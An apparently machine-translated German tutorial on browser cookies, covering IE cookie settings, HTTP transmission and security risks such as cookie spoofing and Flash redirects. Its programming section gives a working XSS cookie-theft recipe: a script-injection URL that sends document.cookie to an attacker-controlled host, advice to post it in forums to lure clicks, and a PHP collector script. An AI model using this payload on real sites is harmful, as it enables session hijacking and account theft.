Cookie bedeutet auf Englisch kleines Dessert, und wir können dieses Wort immer im Browser sehen. Wie kann Essen mit dem Browser in Verbindung gebracht werden? Wenn Sie eine Website durchsuchen, bei der Sie sich zuvor angemeldet haben, wird auf der Webseite möglicherweise die folgende Meldung angezeigt: Hallo XX, es fühlt sich sehr freundlich an, als würde man ein kleines Dessert essen. Dies wird tatsächlich durch den Zugriff auf eine Datei in Ihrem Host erreicht, weshalb diese Datei auch als Cookie bezeichnet wird. Möchten Sie alles über Cookies erfahren? Werfen Sie einen Blick unten!
1. Cookie verstehen Anwendbare Objekte: Anfänger-Leser
Cookie ist eine kleine Textdatei, die die Website auf Ihrem Computer speichert, wenn Sie eine Website durchsuchen. Sie zeichnet Ihre Benutzer-ID, Ihr Passwort, die besuchten Webseiten, die verbrachte Zeit und andere Informationen auf Wenn Sie erneut auf die Website zugreifen, erfährt die Website durch das Lesen des Cookies Ihre relevanten Informationen und kann entsprechende Maßnahmen ergreifen, z. B. die Anzeige eines Slogans zur Begrüßung auf der Seite oder die Möglichkeit, sich direkt anzumelden, ohne Ihre ID oder Ihr Passwort einzugeben, und vieles mehr . Sie können alle auf Ihrem Computer gespeicherten Cookies anzeigen, indem Sie im IE auf der Registerkarte „Allgemein“ von „Extras/Internetoptionen“ „Einstellungen/Dateien anzeigen“ auswählen. Diese Dateien werden normalerweise im Format user@domain benannt, wobei user Ihr lokaler Benutzername und domain der Domänenname der Website ist, die Sie besuchen. Wenn Sie den NetsCape-Browser verwenden, wird dieser unter „C:PROGRAMFILESNETSCAPEUSERS“ gespeichert. Anders als IE verwendet NETSCAPE eine Cookie-Datei, um die Cookies aller Websites aufzuzeichnen.
Um die Internetsicherheit zu gewährleisten, müssen wir Cookies entsprechend setzen. Öffnen Sie die Registerkarte „Datenschutz“ unter „Extras/Internetoptionen“ (beachten Sie, dass diese Einstellung nur in IE6.0 vorhanden ist. Andere Versionen von IE können auf der Registerkarte „Sicherheit“ der Schaltfläche „Extras/Internetoptionen“ auf „Stufe anpassen“ klicken einfache Anpassungen vornehmen), um die Sicherheitsstufe von Cookies anzupassen. Normalerweise können Sie den Schieberegler auf die Position „mittelhoch“ oder „hoch“ einstellen. Die meisten Forenseiten erfordern die Verwendung von Cookie-Informationen. Wenn Sie diese Orte nie besuchen, können Sie die Sicherheitsstufe auf „Alle Cookies blockieren“ einstellen. Wenn Sie nur Cookies von einzelnen Websites blockieren möchten, können Sie auf die Schaltfläche „Bearbeiten“ klicken, um die Websites, die Sie blockieren möchten, zur Liste hinzuzufügen. In der Schaltflächenoption „Erweitert“ können Sie Erstanbieter-Cookies und Drittanbieter-Cookies festlegen. Dabei handelt es sich um Cookies von der Website, die Sie besuchen, und Drittanbieter-Cookies sind keine Cookies, die Ihnen von der Website gesendet werden, auf der Sie sich befinden Normalerweise müssen Sie für Cookies von Drittanbietern „Ablehnen“ wählen, wie in Abbildung 1 dargestellt. Wenn Sie Cookies speichern müssen, können Sie die Funktion „Importieren und Exportieren“ des IE verwenden, „Datei/Importieren und Exportieren“ öffnen und den Anweisungen folgen.
Der Großteil des Inhalts im Cookie ist verschlüsselt, daher scheint es sich nur um eine bedeutungslose Kombination aus Buchstaben und Zahlen zu handeln. Nur der CGI-Handler des Servers kennt deren wahre Bedeutung. Über einige Software können wir weitere Inhalte anzeigen. Die mit der Cookie Pal-Software angezeigten Cookie-Informationen sind in Abbildung 2 dargestellt. Es liefert uns den Inhalt von Server, Ablaufdatum, Name, Wert und anderen Optionen. Unter ihnen ist „Server“ die Website, die Cookies speichert, „Expires“ zeichnet die Zeit und Lebensdauer des Cookies auf und die Felder „Name“ und „Wert“ sind spezifische Daten (eine ausführliche Einführung in diese Software finden Sie in Ausgabe 10, Seite 42 dieser Zeitung).
Download-Adresse: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Cookie-Übermittlungsprozess Anwendbare Objekte: Fortgeschrittene Leser Wenn sie die URL einer Website in die Adressleiste des Browsers eingeben, sendet der Browser eine Anfrage zum Lesen der Webseite an die Website und zeigt das Ergebnis auf dem Monitor an. Zu diesem Zeitpunkt sucht die Webseite nach der von der Amazon-Website auf Ihrem Computer gesetzten Cookie-Datei. Wenn sie gefunden wird, sendet der Browser die Daten in der Cookie-Datei zusammen mit der zuvor eingegebenen URL an den Amazon-Server. Wenn der Server die Cookie-Daten empfängt, ruft er Ihre ID, Ihre Einkaufsaufzeichnungen, persönlichen Vorlieben und andere Informationen in seiner Datenbank ab, zeichnet den neuen Inhalt auf und fügt ihn der Datenbank und den Cookie-Dateien hinzu. Wenn kein Cookie erkannt wird oder Ihre Cookie-Informationen nicht mit den Informationen in der Datenbank übereinstimmen, bedeutet dies, dass Sie die Website zum ersten Mal besuchen und das CGI-Programm des Servers neue ID-Informationen für Sie erstellt und in der Datenbank speichert.
Cookies werden mithilfe der HTTP-Header-Informationen im Webseitencode übertragen. Cookies können bei jeder vom Browser vorgenommenen Webseitenanforderung übertragen werden, beispielsweise wenn der Browser die Webseite öffnet oder aktualisiert. Der Server fügt das Cookie zu den HTTP-Header-Informationen der Webseite hinzu und überträgt die Webseitendaten zurück an Ihren Browser. Der Browser entscheidet anhand der Cookie-Einstellungen auf Ihrem Computer, ob diese Daten gespeichert werden sollen. Wenn der Browser das Speichern von Cookies nicht zulässt, verschwinden die Daten nach dem Schließen des Browsers. Die Dauer der Speicherung von Cookies auf Ihrem Computer ist unterschiedlich und hängt von den Servereinstellungen ab. Cookies verfügen über ein Ablaufdatum (Gültigkeitsdauer), das die Cookie-Speicherdauer bestimmt. Der Server kann die Cookie-Speicherdauer ändern, indem er den Wert des Feldes „Ablauf“ festlegt. Wenn dieses Attribut nicht gesetzt ist, sind die Cookies nur beim Surfen im Internet gültig. Wenn Sie den Browser schließen, verschwinden diese Cookies automatisch. Normalerweise enthält ein Cookie die Felder „Server“, „Ablauf“, „Name“ und „Wert“. Nur die Felder „Name“ und „Wert“ sind für den Server nützlich. Der Inhalt der Felder „Ablauf“ und anderer Felder dient lediglich dazu, dem Browser mitzuteilen, wie diese Cookies verarbeitet werden sollen.
3. Implementierung der Cookie-Programmierung Anwendbare Objekte: Fortgeschrittene Leser Die meisten Web-Programmiersprachen unterstützen Cookies. Wie JavaScript, VBScript, Delphi, ASP, SQL, PHP, C# usw. In diesen objektorientierten Programmiersprachen ist die Programmiernutzung von Cookies grundsätzlich ähnlich: Erstellen Sie zunächst ein Cookie-Objekt (Objekt) und verwenden Sie dann die Steuerfunktion, um dem Cookie Vorgänge zuzuweisen, zu lesen, zu schreiben. Wie kann man also durch Code vertrauliche Informationen in den Cookies anderer Benutzer erhalten? Es folgt eine kurze Einführung.
Diese Methode besteht aus zwei Hauptschritten: Suchen Sie zunächst die Website, die Sie zum Sammeln von Cookies benötigen, analysieren Sie sie und erstellen Sie dann den PHP-Code zum Sammeln von Cookies und stellen Sie ihn auf eine Website, die Sie steuern können, ohne es zu wissen Der Code kann ausgeführt werden, nachdem der Benutzer auf die von Ihnen erstellte URL geklickt hat. Schauen wir uns unten den spezifischen Implementierungsprozess an.
1. Analysieren und erstellen
Sie zunächst die Website, auf der wir Cookies sammeln möchten. Hier gehen wir davon aus, dass es sich um http://www.XXX.net handelt und geben Sie den Benutzernamen „<A1>“ ein. ohne Anführungszeichen), um die Daten zu analysieren und die Pakete zu erfassen, erhalten Sie einen Code in der Form „http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x“. =28&ok.y=6“, ersetzen Sie „<A1>“ Versuchen Sie es erneut für „<script>alert(document.cookie)</script>“; wenn die Ausführung erfolgreich ist, beginnen Sie mit der Erstellung der URL: „http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Unter anderem ist http:///www.cbifamily.org/cbi.php ein Skript auf einem bestimmten Host, das Sie steuern können. Es ist zu beachten, dass „%2B“ die URL-Kodierung des Symbols „+“ ist, da „+“ als Leerzeichen behandelt wird. Die URL kann im Forum gepostet werden, um andere zum Klicken zu bewegen.
2. Bereiten Sie ein PHP-Skript vor.
Die Funktion dieses Skripts besteht darin, Cookie-Dateien zu sammeln.
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("Standort: http://www.downcodes.com ");
?>
4. Cookie-Sicherheitsprobleme Anwendbare Objekte: Alle Leser, die online sicher sein möchten
1. Cookie-Täuschung
Cookies zeichnen Informationen wie Benutzerkonto-IDs und Passwörter auf. Bei der Online-Übertragung wird normalerweise MD5-Verschlüsselung verwendet. Selbst wenn die verschlüsselten Informationen von einigen Personen mit Hintergedanken im Internet abgefangen werden, können sie sie nicht verstehen, da sie nur bedeutungslose Buchstaben und Zahlen sehen. Das Problem besteht nun jedoch darin, dass Personen, die Cookies abfangen, die Bedeutung dieser Zeichenfolgen nicht kennen müssen. Sie müssen nur die Cookies anderer Personen an den Server übermitteln, und wenn sie die Überprüfung bestehen, können sie sich als Identität des Opfers ausgeben Melden Sie sich auf der Website an. Diese Methode wird Cookie-Spoofing genannt. Voraussetzung für Cookie-Spoofing ist, dass im Verifizierungsprogramm des Servers eine Schwachstelle vorliegt und der Betrüger an die Cookie-Informationen der Person gelangen möchte, die sich ausgibt. Für das aktuelle Website-Verifizierungsprogramm ist es sehr schwierig, alle illegalen Anmeldungen auszuschließen. Beispielsweise kann die zum Schreiben des Verifizierungsprogramms verwendete Sprache Lücken aufweisen. Darüber hinaus ist es sehr einfach, die Cookies anderer Personen zu erhalten. Sie können dies erreichen, indem Sie einen kleinen Code in einer Sprache schreiben, die Cookies unterstützt (siehe Details in Methode 3). gesammelt werden können. Wenn ein Forum HTML-Code oder die Verwendung von Flash-Tags zulässt, können Sie mithilfe dieser Technologien Cookie-Code sammeln und in das Forum einfügen, dem Beitrag dann ein attraktives Thema geben und interessante Inhalte schreiben, und Sie können schnell eine große Anzahl sammeln von Cookies. Im Forum wurden die Passwörter vieler Leute auf diese Weise gestohlen. Um dies zu verhindern, gibt es derzeit nur die üblichen Schutzmethoden. Verwenden Sie keine wichtigen Passwörter in Foren, verwenden Sie nicht die IE-Funktion zum automatischen Speichern von Passwörtern und versuchen Sie, sich nicht auf Websites anzumelden wo Sie die Details nicht kennen.
2. Versteckte Gefahren im Flash-Code
Es gibt eine getURL()-Funktion in Flash. Flash kann diese Funktion verwenden, um eine bestimmte Webseite automatisch zu öffnen. Daher kann es sein, dass Sie auf eine Website weitergeleitet werden, die bösartigen Code enthält. Wenn Sie beispielsweise eine wunderschöne Flash-Animation auf Ihrem Computer genießen, wurde der Code im Animationsrahmen möglicherweise stillschweigend mit dem Internet verbunden und eine sehr kleine Seite mit speziellem Code geöffnet. Diese Seite kann Ihre Cookies sammeln und andere Dinge tun, wie zum Beispiel Trojaner auf Ihrem Computer installieren oder sogar Ihre Festplatte formatieren usw. Websites können dieses Verhalten von Flash nicht verbieten, da es sich um das interne Verhalten von Flash-Dateien handelt. Wir können versuchen, die Firewall zu öffnen, wenn Sie lokal surfen. Wenn die Firewall Sie auffordert, die gesendeten Datenpakete nicht zu kennen, ist es am besten, sie zu sperren. Wenn Sie es im Internet genießen möchten, ist es am besten, einige bekannte große Websites zu finden.